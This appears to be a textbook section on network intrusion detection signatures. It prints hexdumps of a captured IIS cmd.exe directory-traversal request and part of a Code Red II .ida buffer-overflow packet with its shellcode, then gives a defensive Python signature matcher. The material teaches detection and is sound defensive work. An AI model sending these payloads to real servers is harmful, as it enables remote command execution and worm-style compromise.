
NIDS Signature Examples

An NIDS operates by examining packets and comparing them to known signatures. A good example of a common attack that can be clearly identified by its signature is the cmd.exe attack that is used against the Internet Information Server (IIS), which is Microsoft's Web server. This attack is used by Internet worms and viruses such as Nimda and Code Red. In this case, the worm or human attacker attempts to execute a copy of cmd.exe, which is the Windows command line binary, in a writable directory using a buffer overflow in the IIS Web server module called Internet Server API (ISAPI). If successful, then the hacker or worm has access to a command line on that machine and can wreak considerable havoc. However, the command to copy this file is obvious; there is no reason for legitimate users to be executing this file over the network via IIS. So if you see this activity, then it's a good bet that it is an intrusion attempt. By examining the packet payload and searching for the words cmd.exe, an NIDS can identify this kind of attack. Listing 7.1 shows one of these packets. The hexadecimal contents are on the left and the ASCII translation is on the right.

Listing 7.1. The cmd.exe Execution Packet

length = 55

000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
010 : 35 63 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79  5c%5c../winnt/sy
020 : 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F  stem32/cmd.exe?/
030 : 63 2B 64 69 72 0D 0A                             c+dir..


Another attack that is easy to identify by its signature is the .ida buffer overflow. The Code Red worm propagated using this method. It utilized a buffer overflow in the .ida extension for Microsoft's IIS Web server. This extension is installed by default but is often not needed. If you don't install the patch for this condition, it can allow direct access to your machine. Fortunately, an NIDS can quickly identify these packets by matching the GET /default.ida statement contained in them. You can see a partial listing of an .ida attack in Listing 7.2. This particular one also has the words Code Red II in it, which means it was generated by a Code Red worm trying to infect this machine. Even if your machines are fully patched and immune to these kinds of attacks, it is good to know where they are coming from and at what frequency.

Listing 7.2. Signature of an .ida Attack

length = 1414

000 : 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61  GET /default.ida
010 : 3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  ?XXXXXXXXXXXXXXX
020 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
030 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
040 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
050 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
060 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
070 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
080 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
090 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
0a0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
0b0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
0c0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
0d0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
0e0 : 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
0f0 : 58 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63  X%u9090%u6858%uc
100 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25  bd3%u7801%u9090%
110 : 75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30  u6858%ucbd3%u780
120 : 31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63  1%u9090%u6858%uc
130 : 62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25  bd3%u7801%u9090%
140 : 75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63  u9090%u8190%u00c
150 : 33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35  3%u0003%u8b00%u5
160 : 33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25  31b%u53ff%u0078%
170 : 75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54  u0000%u00=a  HTT
180 : 50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74  P/1.0..Content-t
190 : 79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 43 6F  ype: text/xml.Co
1a0 : 6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 33  ntent-length: 33
1b0 : 37 39 20 0D 0A 0D 0A C8 C8 01 00 60 E8 03 00 00  79 ........`....
1c0 : 00 CC EB FE 64 67 FF 36 00 00 64 67 89 26 00 00  ....dg.6..dg.&..
1d0 : E8 DF 02 00 00 68 04 01 00 00 8D 85 5C FE FF FF  .....h......\...
1e0 : 50 FF 55 9C 8D 85 5C FE FF FF 50 FF 55 98 8B 40  P.U...\...P.U..@
1f0 : 10 8B 08 89 8D 58 FE FF FF FF 55 E4 3D 04 04 00  .....X....U.=...
200 : 00 0F 94 C1 3D 04 08 00 00 0F 94 C5 0A CD 0F B6  ....=...........
210 : C9 89 8D 54 FE FF FF 8B 75 08 81 7E 30 9A 02 00  ...T....u..~0...
220 : 00 0F 84 C4 00 00 00 C7 46 30 9A 02 00 00 E8 0A  ........F0......
230 : 00 00 00 43 6F 64 65 52 65 64 49 49 00 8B 1C 24  ...CodeRedII...$
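The signature matching described above for both the cmd.exe request (Listing 7.1) and the .ida request (Listing 7.2), as an added example that is not code from the book or from any particular NIDS product. It rebuilds the packet bytes from hexdump rows in the same format as the listings, then runs a small signature table over the payload the way a content-matching sensor would. The signature names, the parser, the benign request and the percent-decoding step are this example's own assumptions: a real sensor also keys on port and direction and does considerably more normalization.

```python
import re
from urllib.parse import unquote_to_bytes

# Listing 7.1 from the text (the cmd.exe request), re-typed as a hexdump string.
LISTING_7_1 = """\
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
010 : 35 63 25 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79  5c%5c../winnt/sy
020 : 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F  stem32/cmd.exe?/
030 : 63 2B 64 69 72 0D 0A                             c+dir..
"""

# The first two rows of Listing 7.2 (the .ida request line); the remaining
# rows of that 1414-byte packet are left out of this example.
LISTING_7_2_HEAD = """\
000 : 47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61  GET /default.ida
010 : 3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  ?XXXXXXXXXXXXXXX
"""

# Constructed benign request: the signatures must not fire on ordinary traffic.
BENIGN_REQUEST = b"GET /index.html HTTP/1.0\r\nHost: www.example.com\r\n\r\n"

# Signature table (names assumed for this example): each entry is the byte
# string the sensor looks for in the payload, following the two patterns the
# text describes.
SIGNATURES = [
    {"name": "IIS cmd.exe access", "content": b"cmd.exe", "nocase": True},
    {"name": "IIS .ida overflow attempt (Code Red)",
     "content": b"GET /default.ida", "nocase": True},
]

# One hexdump row: an offset, a colon, then 1..16 two-digit hex bytes.
HEX_ROW = re.compile(r"^\s*[0-9a-fA-F]+\s*:\s*((?:[0-9a-fA-F]{2}\s)*[0-9a-fA-F]{2})")


def parse_hexdump(text):
    """Rebuild packet bytes from rows of the form 'OFFSET : HH HH ...  ascii'.

    The ASCII column is separated from the hex column by a run of two or more
    spaces, so each row is cut there first; otherwise a printable pair such as
    '79' at the start of an ASCII column would be mistaken for a byte.
    """
    payload = bytearray()
    for line in text.splitlines():
        if not line.strip():
            continue
        hex_column = re.split(r"\s{2,}", line.strip(), maxsplit=1)[0]
        m = HEX_ROW.match(hex_column)
        if m is None:
            raise ValueError("not a hexdump row: %r" % line)
        payload += bytes.fromhex(m.group(1))  # fromhex ignores the spaces
    return bytes(payload)


def normalize_request_line(payload):
    """Percent-decode the HTTP request line, as an HTTP-aware sensor does before
    content matching, so that an escaped spelling of a path still matches.
    Headers and body after the first CRLF are left untouched."""
    request_line, sep, rest = payload.partition(b"\r\n")
    return unquote_to_bytes(request_line) + sep + rest


def match_signatures(payload, signatures=SIGNATURES):
    """Return the names of every signature whose content occurs in the payload,
    checked against both the raw bytes and the normalized request line."""
    views = (payload, normalize_request_line(payload))
    hits = []
    for sig in signatures:
        needle, haystacks = sig["content"], views
        if sig.get("nocase"):
            needle = needle.lower()
            haystacks = tuple(v.lower() for v in views)
        if any(needle in h for h in haystacks):
            hits.append(sig["name"])
    return hits


if __name__ == "__main__":
    for label, pkt in (("Listing 7.1", parse_hexdump(LISTING_7_1)),
                       ("Listing 7.2 (head)", parse_hexdump(LISTING_7_2_HEAD)),
                       ("benign request", BENIGN_REQUEST)):
        print("%-20s %4d bytes -> %s"
              % (label, len(pkt), match_signatures(pkt) or "no match"))
```

Parsing Listing 7.1 yields exactly 55 bytes, matching the length the listing reports, and only the cmd.exe signature fires on it; the head of Listing 7.2 triggers only the .ida signature, and the benign request triggers nothing. Matching the percent-decoded request line as well as the raw bytes is the practical point: a sensor that only does a raw substring search sees the same path spelled with an escaped character as a different string, which is why HTTP-aware preprocessors normalize the URI before the content check.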

